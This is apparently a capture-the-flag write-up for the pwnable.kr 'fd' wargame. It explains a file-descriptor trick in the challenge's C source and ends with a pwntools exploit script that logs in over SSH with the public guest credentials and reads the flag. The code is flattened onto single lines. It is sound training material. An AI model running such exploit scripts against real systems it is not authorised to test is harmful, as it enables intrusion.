try to play the wargame your self but if you are ABSOLUTE beginner, follow this tutorial link: https://youtu.be/971eZhMHQQw
ssh fd@pwnable.kr -p2222 (pw:guest)
Code Review
#include<stdio.h>#include<stdlib.h>#include<string.h>char buf[32];intmain(int argc,char* argv[],char* envp[]){if(argc<2){printf("pass argv[1] a number\n");return0; }int fd =atoi( argv[1] )-0x1234;int len =0; len =read(fd, buf,32);if(!strcmp("LETMEWIN\n", buf)){printf("good job :)\n");system("/bin/cat flag");exit(0); }printf("learn about Linux file IO\n");return0;}
Take a look at this portion of the code:
int fd =atoi( argv[1] ) -0x1234;int len =0;len =read(fd, buf,32);
From man7.org:
Solution
In Linux, the default file descriptors are:
stdin (standard input) => 0
stdout (standard output) => 1
stderr (standard error) => 2
We are able to control the value of fd. The desirable value is fd = 0 since it will open a stdin session. We can send information through stdin and that information will be stored in buf. The idea is clear:
Set argv[1] = 0x1234 so that fd = 0.
Send "LETMEWIN" through stdin.
Exploit
#!/usr/bin/env python3# -*- coding: utf-8 -*-# This exploit template was generated via:# $ pwn template --host pwnable.kr --port 2222 --user fd --password guest --path /home/fd/fdfrom pwn import*# Set up pwntools for the correct architectureexe = context.binary =ELF('fd')# Many built-in settings can be controlled on the command-line and show up# in "args". For example, to dump all data sent/received, and disable ASLR# for all created processes...# ./exploit.py DEBUG NOASLR# ./exploit.py GDB HOST=example.com PORT=4141host = args.HOST or'pwnable.kr'port =int(args.PORT or2222)user = args.USER or'fd'password = args.PASSWORD or'guest'remote_path ='/home/fd/fd'# Connect to the remote SSH servershell =Noneifnot args.LOCAL: shell =ssh(user, host, port, password) shell.set_working_directory(symlink=True)defstart_local(argv=[],*a,**kw):'''Execute the target binary locally'''if args.GDB:return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)else:returnprocess([exe.path] + argv, *a, **kw)defstart_remote(argv=[],*a,**kw):'''Execute the target binary on the remote host'''if args.GDB:return gdb.debug([remote_path] + argv, gdbscript=gdbscript, ssh=shell, *a, **kw)else:return shell.process([remote_path] + argv, *a, **kw)defstart(argv=[],*a,**kw):'''Start the exploit against the target.'''if args.LOCAL:returnstart_local(argv, *a, **kw)else:returnstart_remote(argv, *a, **kw)# Specify your GDB script here for debugging# GDB will be launched if the exploit is run via e.g.# ./exploit.py GDBgdbscript ='''tbreak maincontinue'''.format(**locals())#===========================================================# EXPLOIT GOES HERE#===========================================================# Arch: i386-32-little# RELRO: Partial RELRO# Stack: No canary found# NX: NX enabled# PIE: No PIE (0x8048000)argv = [str(0x1234)]io =start(argv)io.sendline(b'LETMEWIN')success(io.readall().decode())